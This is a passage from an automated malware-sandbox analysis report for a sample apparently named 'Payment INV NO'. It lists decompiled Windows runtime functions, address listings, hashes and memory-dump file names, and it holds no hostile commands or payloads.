                                                          • Opcode Fuzzy Hash: 1b080f20051eb5427769068f141024a3f72076cdfa357995daa2ab2e55cff42a
                                                          • Instruction Fuzzy Hash: D811E6365415549FCB6ADF4CCE80F6EB7B9BB48B00F55006CE505A7692D328ED10CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017931E0 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017931E0(intOrPtr _a4, intOrPtr _a8) {
				char* _t12;
				signed int* _t13;
				signed int _t26;
				intOrPtr _t28;

				_t28 = _a4;
				_t26 = 0;
				_t12 = E0179354C(_t28, 0);
				if(_t12 == 0) {
					L3:
					return _t12;
				}
				if(_a8 != 0) {
					_t13 = _t28 + 0xa8;
					_t26 =  *_t13;
					 *_t13 = 0;
				}
				_t12 = E017C9ED0(_t28 + 0x20,  ~_t26, 1);
				if(_t26 != 0) {
					if(E017B7D50() == 0) {
						_t12 = 0x7ffe0386;
					} else {
						_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					}
					if( *_t12 == 0) {
						goto L3;
					}
					return L01868966( *((intOrPtr*)(_t28 + 0x5c)), _t28 + 0x78, _t28 + 0x30,  *((intOrPtr*)(_t28 + 0x34)),  *((intOrPtr*)(_t28 + 0x3c)), _t26);
				} else {
					goto L3;
				}
			}







                                                          0x017931e6
                                                          0x017931ec
                                                          0x017931f1
                                                          0x017931f8
                                                          0x0179321c
                                                          0x0179321c
                                                          0x0179321c
                                                          0x017931fd
                                                          0x017efe1e
                                                          0x017efe24
                                                          0x017efe24
                                                          0x017efe24
                                                          0x0179320c
                                                          0x01793213
                                                          0x017efe32
                                                          0x017efe44
                                                          0x017efe34
                                                          0x017efe3d
                                                          0x017efe3d
                                                          0x017efe4c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e93efd3d575d446bfc45c893608c24edbda694e5eaa843ed684df09a0b1541ec
                                                          • Instruction ID: d8beeb0b02c9cb10a91e7c1cb76120a0d4255fcbc4f02f609556dea14f42ac5c
                                                          • Opcode Fuzzy Hash: e93efd3d575d446bfc45c893608c24edbda694e5eaa843ed684df09a0b1541ec
                                                          • Instruction Fuzzy Hash: 2E01F5322047019FEB22D6BAE908AA7F7EEFFC9A10F144459EA468B540DA30F805CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017AFC77 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017AFC77(void* __ebx, void* __esi) {
				intOrPtr* _t16;
				signed int _t17;
				void* _t24;
				void* _t29;
				void* _t30;

				_t29 = __esi;
				_t24 = __ebx;
				_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t16 != 0) {
					if( *_t16 == 0) {
						goto L1;
					}
					_t17 =  *( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a) & 0x000000ff;
					L2:
					if(_t17 != 0) {
						_t17 =  *[fs:0x30];
						if(( *(_t17 + 0x240) & 0x00000004) != 0) {
							if(E017B7D50() == 0) {
								_t17 =  *0x7ffe0385 & 0x000000ff;
							} else {
								_t17 =  *( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b) & 0x000000ff;
							}
							if((_t17 & 0x00000020) != 0) {
								_t17 = L01817016(0x1496, _t29, 0xffffffff, 0xffffffff, _t24, _t24);
							}
						}
					}
					if( *((intOrPtr*)(_t30 - 0x24)) != _t24) {
						L16:
						return E0179B1E1(0xc0000142, 0x1496,  *((intOrPtr*)(_t30 + 8)), _t24);
					} else {
						if( *((char*)(_t30 - 0x19)) == 0) {
							if( *((intOrPtr*)(_t30 + 8)) != 1) {
								goto L5;
							} else {
								goto L16;
							}
						}
						L5:
						return _t17;
					}
				}
				L1:
				_t17 =  *0x7ffe0384 & 0x000000ff;
				goto L2;
			}








                                                          0x017afc77
                                                          0x017afc77
                                                          0x017afc7d
                                                          0x017afc82
                                                          0x017fbec6
                                                          0x00000000
                                                          0x00000000
                                                          0x017fbed5
                                                          0x017afc8f
                                                          0x017afc91
                                                          0x017fbee1
                                                          0x017fbeee
                                                          0x017fbefb
                                                          0x017fbf0f
                                                          0x017fbefd
                                                          0x017fbf06
                                                          0x017fbf06
                                                          0x017fbf18
                                                          0x017fbf2b
                                                          0x017fbf2b
                                                          0x017fbf18
                                                          0x017fbeee
                                                          0x017afc9a
                                                          0x017fbf35
                                                          0x00000000
                                                          0x017afca0
                                                          0x017afca4
                                                          0x017afcab
                                                          0x00000000
                                                          0x017afcad
                                                          0x00000000
                                                          0x017afcad
                                                          0x017afcab
                                                          0x017afca6
                                                          0x017afca6
                                                          0x017afca6
                                                          0x017afc9a
                                                          0x017afc88
                                                          0x017afc88
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 22c0f17c150cc97693796dc835e0a6b1c7f2368aca505a92ed105f47d9466843
                                                          • Instruction ID: ad85d678dab6dc741653c2b3d91207365ba24e3350fbd8c5a3f6679e05448443
                                                          • Opcode Fuzzy Hash: 22c0f17c150cc97693796dc835e0a6b1c7f2368aca505a92ed105f47d9466843
                                                          • Instruction Fuzzy Hash: C2112B30205290DFE7269B1DC598FB9BBF5EF45794F4406E9FA51872E1D338C980CA11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017970C0 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E017970C0(signed int* __ecx) {
				signed int _t27;
				signed char _t34;
				signed int _t38;
				signed int* _t40;

				_t40 = __ecx;
				if(__ecx == 0) {
					return _t27;
				}
				_t38 = 0;
				if( *((intOrPtr*)(__ecx + 4)) <= 0) {
					L6:
					if(( *_t40 & 0x00000001) != 0) {
						_t27 = E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t40[2]);
					}
					_t40[2] = _t40[2] & 0x00000000;
					_t40[1] = _t40[1] & 0x00000000;
					 *_t40 =  *_t40 & 0x00000000;
					return _t27;
				}
				do {
					_t27 = _t40[2];
					_t34 =  *((intOrPtr*)(_t27 + _t38 * 4));
					if(_t34 != 0) {
						 *(_t34 + 8) =  *(_t34 + 8) & 0;
						 *((intOrPtr*)(_t34 + 4)) = 0;
						if( *(_t34 + 0xc) != 0) {
							_push( *(_t34 + 0xc));
							E017D95D0();
							 *(_t34 + 0xc) =  *(_t34 + 0xc) & 0x00000000;
						}
						 *(_t40[2] + _t38 * 4) =  *(_t40[2] + _t38 * 4) & 0x00000000;
						_t27 = E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t34);
					}
					_t38 = _t38 + 1;
				} while (_t38 < _t40[1]);
				goto L6;
			}







                                                          0x017970c3
                                                          0x017970c7
                                                          0x017970f9
                                                          0x017970f9
                                                          0x017970ca
                                                          0x017970cf
                                                          0x017970e3
                                                          0x017970e7
                                                          0x017f22e0
                                                          0x017f22e0
                                                          0x017970ed
                                                          0x017970f1
                                                          0x017970f5
                                                          0x00000000
                                                          0x017970f5
                                                          0x017970d2
                                                          0x017970d2
                                                          0x017970d5
                                                          0x017970da
                                                          0x017970fc
                                                          0x017970ff
                                                          0x01797105
                                                          0x01797107
                                                          0x0179710a
                                                          0x0179710f
                                                          0x0179710f
                                                          0x01797119
                                                          0x01797126
                                                          0x01797126
                                                          0x017970dc
                                                          0x017970dd
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ab8b61fa7f5365244af160f0581b64cbc40aefc1b0ccfd4ae88da4bbabe8ca3
                                                          • Instruction ID: 5eba38c49b5402a8f7f526e9eef1166b7b1f71e5577545a59140984997c7abad
                                                          • Opcode Fuzzy Hash: 1ab8b61fa7f5365244af160f0581b64cbc40aefc1b0ccfd4ae88da4bbabe8ca3
                                                          • Instruction Fuzzy Hash: 83118B32520B02DFDB369E18D880B22F7E1BF50722F198868D5994A5A6C778E884CF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017995F0 Relevance: .0, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 67%
                                                          			E017995F0(intOrPtr _a4, char _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t10;
				void* _t17;
				void* _t18;
				char* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				intOrPtr _t29;

				_t29 = _a4;
				_push(_t25);
				if(_t29 == 0 || _a8 < 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					L018688F5(_t17, _t18, _t23, _t25, _t29, __eflags);
					_t10 = 0xc000000d;
				} else {
					_push(4);
					_push( &_a8);
					_push(4);
					_push( *((intOrPtr*)(_t29 + 0x24)));
					_t27 = E017DAE70();
					if(E017B7D50() != 0) {
						_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t21 = 0x7ffe0386;
					}
					if( *_t21 != 0) {
						__eflags = _t27;
						if(_t27 >= 0) {
							L01868C75(_t29, _a8);
						}
					}
					_t10 = _t27;
				}
				return _t10;
			}














                                                          0x017995f9
                                                          0x017995fc
                                                          0x017995ff
                                                          0x0179964d
                                                          0x01799652
                                                          0x01799616
                                                          0x01799616
                                                          0x0179961b
                                                          0x0179961c
                                                          0x0179961e
                                                          0x01799626
                                                          0x0179962f
                                                          0x017f3a8b
                                                          0x01799635
                                                          0x01799635
                                                          0x01799635
                                                          0x0179963d
                                                          0x017f3a96
                                                          0x017f3a98
                                                          0x017f3aa3
                                                          0x017f3aa3
                                                          0x017f3a98
                                                          0x01799643
                                                          0x01799643
                                                          0x0179964a

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7997ab003be32b25182207cd7490528100ba51f99dc596edd761923d6f7878d9
                                                          • Instruction ID: 511115f621c22cce8345cf75e4e46208ea776d95da6c0bb3c604578519d4ed7f
                                                          • Opcode Fuzzy Hash: 7997ab003be32b25182207cd7490528100ba51f99dc596edd761923d6f7878d9
                                                          • Instruction Fuzzy Hash: E2017B32A01244DBEF119B58D804F25F3A9AB81738F10415DEF058B390DB34EE08C7D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017AB02A Relevance: .0, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017AB02A(void* __ecx, void* __edx, intOrPtr _a4) {
				signed char _t11;
				signed char* _t12;
				void* _t24;
				void* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E017B7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return L01817016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                          0x017ab037
                                                          0x017ab039
                                                          0x017ab03b
                                                          0x017ab040
                                                          0x017fa60e
                                                          0x00000000
                                                          0x00000000
                                                          0x017fa61d
                                                          0x017ab04b
                                                          0x017ab04e
                                                          0x017fa627
                                                          0x017fa634
                                                          0x00000000
                                                          0x00000000
                                                          0x017fa641
                                                          0x017fa653
                                                          0x017fa643
                                                          0x017fa64c
                                                          0x017fa64c
                                                          0x017fa65b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017fa66c
                                                          0x017ab057
                                                          0x017ab057
                                                          0x017ab057
                                                          0x017ab046
                                                          0x017ab046
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 639e7a6806566b91925c383ad749401bcbd7d909a8ca16fd9d998a26464d5db8
                                                          • Instruction ID: 965366998612e2c5d1bab47f41ed3b5d85f973c6d48a5386e0a5535dc122f505
                                                          • Opcode Fuzzy Hash: 639e7a6806566b91925c383ad749401bcbd7d909a8ca16fd9d998a26464d5db8
